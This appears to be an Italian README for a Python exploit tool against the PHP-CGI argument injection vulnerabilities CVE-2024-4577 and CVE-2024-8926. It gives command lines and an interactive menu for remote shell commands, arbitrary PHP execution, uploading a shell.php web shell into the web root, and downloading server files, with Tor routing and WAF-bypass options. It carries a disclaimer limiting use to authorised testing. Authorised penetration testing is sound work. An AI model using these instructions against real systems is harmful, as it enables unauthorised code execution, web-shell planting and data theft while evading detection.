
Uno strumento di penetration testing per testare le CVE-2024-4577 e CVE-2024-8926.
🚀 Strumento Exploit per CVE-2024-4577 e CVE-2024-8926
Strumento di test automatizzato per la vulnerabilità di iniezione dei parametri PHP-CGI, supporta CVE-2024-4577 e CVE-2024-8926, consentendo esecuzione di comandi, upload e download di file e altro.
Questo strumento può essere utilizzato per testare la vulnerabilità di iniezione dei parametri negli ambienti PHP-CGI e offre:
Questo strumento è destinato esclusivamente a test legittimi e scopi accademici. Non utilizzarlo su sistemi non autorizzati!
⚠️ L'uso illegale comporta responsabilità legali!
Questo strumento è destinato esclusivamente a:
Questo strumento dipende dai seguenti pacchetti Python. Installarli prima:
pip install -r requirements.txt
Oppure installazione manuale:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
Esempio:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
Quando lo script trova una vulnerabilità, mostra il menu:
╭──────────── Menu modalità Exploit ────────────╮
│ Destinazione attuale:http://example.com/ │
│ Punto di iniezione attuale:/php-cgi/php-cgi.exe │
│ ID vulnerabilità:CVE-2024-4577 │
╰────────────────────────────────────────────╯
1) 🧪 Modalità Shell
2) 🛠️ Modalità codice PHP personalizzato
3) 📤 Carica file
4) 📥 Scarica file
5) 🎯 Cambia destinazione dell'attacco
6) ⚙️ Impostazioni parametri
7) ❌ Esci dal programma
>>
Esegue comandi di sistema:
shell> whoami
📂 Salvataggio dell'output
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
Esegue codice PHP personalizzato:
phpinfo();
EOF
📂 Salvataggio dell'output
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
Percorso del file locale:C:\test\shell.php
Percorso completo di destinazione:
[*] Percorso di upload impostato automaticamente su: C:/xampp/htdocs/shell.php
📂 Specifica manuale del percorso
Percorso completo di destinazione:C:\xampp\php\shell.php
Percorso del file remoto:C:\xampp\htdocs\index.php
📂 Dopo il download, i file vengono salvati in download/; in caso di duplicati, viene aggiunto automaticamente un numero
[*] Download del file completato, salvato in download/index.php
Inserisci il nuovo URL di destinazione: http://newtarget.com
🔹 La vulnerabilità verrà nuovamente testata
[⚙️ Menu impostazioni parametri della fase di sfruttamento]
1) Cambia Payload 1
2) Modulo Bypass Non selezionato
3) Timeout 10 secondi
4) Ritardo richieste Delay 0 secondi
5) Registrazione Log Disattivata
6) Modalità dettagliata Verbose Disattivata
7) Effetti animazione Effects Attivi
8) Sfruttamento forzato Force Disattivato
9) Salva e torna al menu Exploit
Sono disponibili le seguenti strategie di bypass:
php://input con altre formulazioni| Parametro | Descrizione | Esempio |
|---|
-u 、 --url | Specifica l'URL di destinazione | -u http://example.com |
--timeout sec | Imposta il timeout della richiesta (0 = illimitato) | --timeout 30 |
--log | Registra automaticamente i comandi shell | --log |
--payload | Specifica o personalizza la combinazione di Payload | --payload 2 |
--tor | Invia le richieste tramite Tor | --tor |
--verbose | Mostra messaggi dettagliati | --verbose |
--bypass | Abilita la modalità di bypass WAF | --bypass |
--force | Forza la modalità di sfruttamento | --force |
--cgipoint PATHS | Specifica percorsi CGI particolari da testare | --cgipoint /path |
--delay sec | Secondi di attesa tra una richiesta e l'altra | --delay 1.5 |
--no-effects | Disattiva tutte le animazioni e gli effetti di ritardo | --no-effects |